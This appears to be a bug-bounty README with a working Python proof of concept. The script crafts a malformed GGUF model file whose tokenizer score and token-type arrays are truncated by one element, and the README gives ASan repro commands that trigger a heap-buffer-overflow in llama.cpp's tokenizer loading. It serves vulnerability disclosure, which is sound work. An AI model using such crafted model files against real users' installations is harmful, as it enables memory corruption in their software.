llama-cpp-tokenizer-oob-poc / README.md

kwikyy

Add model card metadata header

d6f1a63 verified about 1 month ago

preview code

raw

history blame contribute delete

4.52 kB

metadata

license: other
language:
  - en
tags:
  - security
  - gguf
  - poc
  - llama-cpp
  - huntr
library_name: llama-cpp

Huntr submission notes

This folder contains a status summary and repro steps for a GGUF heap-buffer-overflow in tokenizer metadata parsing.

Files

huntr_submission/STATUS.md

PoC model file

tmp/gguf_fuzz/llama-spm-bad-scores.gguf

Base model file

models/ggml-vocab-llama-spm.gguf

PoC generation

The PoC is created by truncating tokenizer.ggml.scores and tokenizer.ggml.token_type by 1 element.
Script used:

import struct
from pathlib import Path

in_path = Path('models/ggml-vocab-llama-spm.gguf')
out_path = Path('tmp/gguf_fuzz/llama-spm-bad-scores.gguf')

GGUF_TYPE_SIZES = {
    0: 1, 1: 1, 2: 2, 3: 2, 4: 4, 5: 4, 6: 4, 7: 1, 8: None, 9: None, 10: 8, 11: 8, 12: 8,
}
GGUF_TYPE_FORMAT = {
    0: '<B', 1: '<b', 2: '<H', 3: '<h', 4: '<I', 5: '<i', 6: '<f', 7: '<b', 10: '<Q', 11: '<q', 12: '<d',
}

def read_exact(f, n):
    b = f.read(n)
    if len(b) != n:
        raise EOFError('unexpected EOF')
    return b

def read_u32(f): return struct.unpack('<I', read_exact(f, 4))[0]
def read_i32(f): return struct.unpack('<i', read_exact(f, 4))[0]
def read_u64(f): return struct.unpack('<Q', read_exact(f, 8))[0]
def read_i64(f): return struct.unpack('<q', read_exact(f, 8))[0]

def read_string(f):
    n = read_u64(f)
    return read_exact(f, n)

def parse_file(path):
    with open(path, 'rb') as f:
        magic = read_exact(f, 4)
        version = read_u32(f)
        n_tensors = read_i64(f)
        n_kv = read_i64(f)
        kv_list = []
        for _ in range(n_kv):
            key = read_string(f)
            vtype = read_i32(f)
            if vtype == 9:
                arr_type = read_i32(f)
                arr_len = read_u64(f)
                if arr_type == 8:
                    vals = [read_string(f) for _ in range(arr_len)]
                else:
                    size = GGUF_TYPE_SIZES[arr_type]
                    data = read_exact(f, size * arr_len)
                    fmt = GGUF_TYPE_FORMAT[arr_type]
                    vals = list(struct.unpack('<' + fmt[1] * arr_len, data))
                kv_list.append((key, vtype, arr_type, vals))
            elif vtype == 8:
                val = read_string(f)
                kv_list.append((key, vtype, None, val))
            else:
                size = GGUF_TYPE_SIZES[vtype]
                val = struct.unpack(GGUF_TYPE_FORMAT[vtype], read_exact(f, size))[0]
                kv_list.append((key, vtype, None, val))
        return magic, version, n_tensors, kv_list

def write_file(path, magic, version, n_tensors, kv_list):
    with open(path, 'wb') as f:
        f.write(magic)
        f.write(struct.pack('<I', version))
        f.write(struct.pack('<q', n_tensors))
        f.write(struct.pack('<q', len(kv_list)))
        for key, vtype, arr_type, val in kv_list:
            f.write(struct.pack('<Q', len(key)))
            f.write(key)
            f.write(struct.pack('<i', vtype))
            if vtype == 9:
                f.write(struct.pack('<i', arr_type))
                f.write(struct.pack('<Q', len(val)))
                if arr_type == 8:
                    for s in val:
                        f.write(struct.pack('<Q', len(s)))
                        f.write(s)
                else:
                    fmt = GGUF_TYPE_FORMAT[arr_type]
                    f.write(struct.pack('<' + fmt[1] * len(val), *val))
            elif vtype == 8:
                f.write(struct.pack('<Q', len(val)))
                f.write(val)
            else:
                f.write(struct.pack(GGUF_TYPE_FORMAT[vtype], val))

magic, version, n_tensors, kv_list = parse_file(in_path)
new_kv = []
for key, vtype, arr_type, val in kv_list:
    if key == b'tokenizer.ggml.scores' and vtype == 9:
        val = val[:-1]
    if key == b'tokenizer.ggml.token_type' and vtype == 9:
        val = val[:-1]
    new_kv.append((key, vtype, arr_type, val))

write_file(out_path, magic, version, n_tensors, new_kv)
print('wrote', out_path)

Repro (ASan)

cmake -B build-asan -DLLAMA_SANITIZE_ADDRESS=ON -DLLAMA_SANITIZE_UNDEFINED=ON -DGGML_SANITIZE_ADDRESS=ON -DGGML_SANITIZE_UNDEFINED=ON -DGGML_CCACHE=OFF -DLLAMA_BUILD_TESTS=ON -DLLAMA_BUILD_EXAMPLES=ON -DLLAMA_BUILD_TOOLS=ON -DLLAMA_BUILD_SERVER=OFF -DCMAKE_BUILD_TYPE=RelWithDebInfo
cmake --build build-asan --target llama-tokenize -j $(getconf _NPROCESSORS_ONLN)
./build-asan/bin/llama-tokenize -m tmp/gguf_fuzz/llama-spm-bad-scores.gguf -p "hello"